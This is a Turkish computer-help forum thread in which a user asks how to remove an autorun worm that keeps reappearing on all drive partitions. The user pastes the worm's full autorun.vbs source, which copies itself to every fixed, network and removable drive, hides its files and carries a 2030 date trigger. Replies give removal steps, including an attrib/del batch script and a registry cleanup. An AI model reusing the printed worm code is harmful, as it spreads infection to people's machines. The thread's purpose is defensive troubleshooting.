Arkadaşlar bilgisayarıma galiba bir virüs bulaştı ve sabit diskin bütün bölümlerinde alttaki resimdeki autorun dosyaları oluştu..
Şimdi ben bu dosyalrın hepsii siliyorumm siliyorum ama tekrar geri geliyor.. bilgisayarda toplam altı bölüme ayrılmış üç adet fiziksel disk var. ve bu dosyalar bütün bölümlerde var.. hepsini siliyorum tek tek sonra bilgisayarıma girip diskin birini açmaya çalışınca tekrar bu dosyalar ortaya çıkıyor... Bu arada dosyalar korunan gizli sistem dosyası olarak görünüyor.. kendi kendini gizliyorlar...
Bilgisayarıma giripde diske sağ tıklatınca alttaki resimdeki gibi karışık karakterlerde bir menü açılıyor..
Acabaa ben bu beladan nasıl kurtulabilirim... Bir bilgisi olan varmı..
Şimdi bu autorun dosyası galiba visual basicte yazılmış. ama ben vbden anlamıyorum . belki bir anlayan çıkar diye autorun.vbs dosyasının içeriğini altta yazıyorum...
if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then a=WshShell.Run("autorun.bat Over" ,0,True) Set Of = CreateObject("Scripting.FileSystemObject") Set fc = Of.OpenTextFile("C:\autorun.txt", 1) mt = fc.ReadAll fc.Close if mt<>"" then msgbox decrypt(mt) end if
if Year(Date)>2030 or Month(Date)>100 then else For i=1 to 1 set Of = CreateObject("Scripting.FileSystemObject") set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives if WScript.ScriptFullName=dir&"\autorun.vbs" then isdir=true else a=WshShell.Run("autorun.bat Open" ,0,False) isdir=false end if For Each d In dc If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then a=WshShell.Run("autorun.bat - "&d ,0,True) if isdir then Of.CopyFile dir&"\autorun.*",d&"\",True else Of.CopyFile "autorun.*",d&"\",True end if a=WshShell.Run("autorun.bat + "&d ,0,True) End If next if isdir then wscript.sleep 60000 i=0 else a=WshShell.Run("autorun.bat - "&dir ,0,True) Of.CopyFile "autorun.*",dir&"\",True a=WshShell.Run("autorun.bat + "&dir ,0,True) End if next End if
function decrypt(dcode) dim texts dim i for i=1 to len(dcode)-4 x=i mod 5 texts=texts & chr(asc(mid(dcode,i,1))-x) next decrypt=texts end function
Bu tür dosyaları silsenizde tekrar tekrar oluşturan küçük bir proğram vardır. O proğramı bulup silmeniz gerekir. Eğer virüs tarayıcınız bunu bulamıyorsa şöyle bir yol deneyebilirsiniz. Öncelikle bu dosyaların oluşturulma tarihlerini kontrol edin. Büyük ihtimal hepsinde aynı tarih vardır. Daha sonra dosya aramaya girip o tarihte oluşturulmuş dosya ve klasörleri aratın. Aramayı sadece uygulama dosyaları olarakta filtreleyebilirsiniz. Çok fazla uygulama dosyası çıkmayacaktır. Şüphelendiğiniz bir dosyanın özelliklerinden sürüm kısmına bakın dosya adı sürümü vbz. kısmında o acayip karakterleri görürseniz aradığınız dosya odur hemen silin. Kolay gelsin...
Bencesur bilgisayarın ile ilgili sorun ne o9ldu? Yazdıklarım sorununu çözebildinmi yoksa farklı bir şey yaptınmı? Bilgilendirebilirmisin?
biosa ya da autoexec,bat ve config sys dosyalarına yazmış olabilir.
anladığım kadarıyla, 30/6/2030 tarihinde ve ya da 2030 yılının 100. gününden sonra bilgisayarı haşat et gibi birşey bu.
biosa ya da autoexec.bat dosyasına yazmış olabilir. dolayısıyla, sen silsen bile, bilgisayarı her başlattığında dosya yeniden oluşarak yerleşecektir.
bence, temiz bir sistem disketi oluştur. bilgisayarı sistem disketi ile başlat ve virüs programını çalıştır. bilgisayardaki autoexec.bat ve config.sys dosyalarını, bu dosyalar çalışmadan taratman gerekecek çünkü.
not: bu bilgiler kesin değil. belki işe yarar diye söylüyorum...
kaspersky 6 yükleyip tarat bilgisayarı.
1- bilgisayarı aç 2- CTRL +ALT +DEl den görev yöneticisine geç. kullanıcı adının bulundugu explorer haric uygulamaları kapat(explorer olan haric. exp1lore gibi isimler varsa onlarıda kapat) 3- Bilgisayarımdan bir sürücüye girerken çift sakın tıklaMA. sağ tıkla aç kullan. bu ikisi arasında çok fark var. (Autorun dosyası olayı) 4- bilgisayarım penceresini aç. Araçlar klasör seçeneklerine gir. Burada 1- gizli dosyaları göster işaretle 2- korunan işletim sistemi dosylarını gizlenin işaretini kaldır. 3- bilinen dosyalar için uzantıları gizlenin işaretini kaldır. tamam tamam tıkla 5- tek tek sürücülere sağ tıklayarak şu adımları izle: 6- C(D,E...) ye sağ tıkla ac tıkla 7- autorun.inf dosyaını aç içine shell arayüzü ile ilişiklendirilmiş bir exe uzatılı dosya adı göreceksin. copy.exe... gibi bu isimdeki dosyayı C kök dizininden sil . hatta tüm sürücü kok dizinlerindwe buldugun tüm exe dosyaları sil 8- autorun.inf dosyasını sil. 9- daha sonra başlat çalıştır regedit-HKEY_CURRENT_USER\Software\microsoft \Windows\CurrentVersion\Explorer\MountPoints2\ yolunu izle oradan sürücü isimlerinde bulunan autorun yada autoplay anahtarlarını sil Br başka yöntem forumdaki bir arkadaşımızda alıntıdır ama şuan adını hatırlayamadım
c: attrib -h -r -s autorun.inf attrib -h -r -s bittorrent.exe attrib -h -r -s sxs.exe attrib -h -r -s copy.exe attrib -h -r -s command.exe attrib -h -r -s msvcr71.dll del autorun.inf del bittorrent.exe del sxs.exe del copy.exe del command.exe del ravmonlog del msvcr71.dll bunları bi txt dosyasına yaz uzantısını txt değil bat yap yap çalıştır başka sürücülerinde varsa c yi değiştir tekrar çalıştır en son makinaya reset at kolay gelsin
Bencesur bilgisayarın ile ilgili sorun ne o9ldu? Yazdıklarım sorununu çözebildinmi yoksa farklı bir şey yaptınmı? Bilgilendirebilirmisin?
Ben bu işi başka bir yolla halettim.
Çünkü kaspersky 5 ile taradım ad-aware ile taradım hiç bişey bulamadı...
Şimdi bilgisayarımdaki 6 bölümden oluşan 3 diske bulaşmıştı..bütün disklerde aynı sorun.. Önce çoook uğraştım antivirüs yada ad-ware ile. ama olmadı. sonra aklıma biraz riskli ama mecbur kaldığım bir yol geldi.. Şimdi XP kurulum cdsiyle bilgisayarımdaki bütün diskleri biçimlendirdim ve sildim. Disklerim sıfır disk haline gelince daha önceki windowsun kurulu olduğu bölüme tekrar windowsu kurdum daha sonra File Scavenger isimli veri kurtarma programı ile önemli dosyalarımın bulunduğu diskleri tarayarak kurtardım.. Bu sırada sözkonusu autorun.vsvs dosyalarının hepsi geri geldi ama etkisiz olarak geldiği için bende hemen sildim kurtuldum...
İşte bu kadar.. Herkese kolay gelsin...
Şimdi ben bunun ne işe yaradığını çok merak ediyorum.. Çünkü aklı başında birisi sadece diski otomatik çalıştırsın diye bu kadar uğraşıpta virüs yazmaz. Bu virüs kesinlikle başka bir iş yapıyordu...ama bulamadım..
kardeş boşuna bu kadar zahmet çekmişsin. forumda biraz araştırsan bu problemi yaşayan ve çözüldüğünü söyleyen bir çok kişi var. sonuçta autorun sorunu silinebilen bir virüs.
yeni mesaja git
Yeni mesajları sizin için sürekli kontrol ediyoruz, bir mesaj yazılırsa otomatik yükleyeceğiz.Bir Daha Gösterme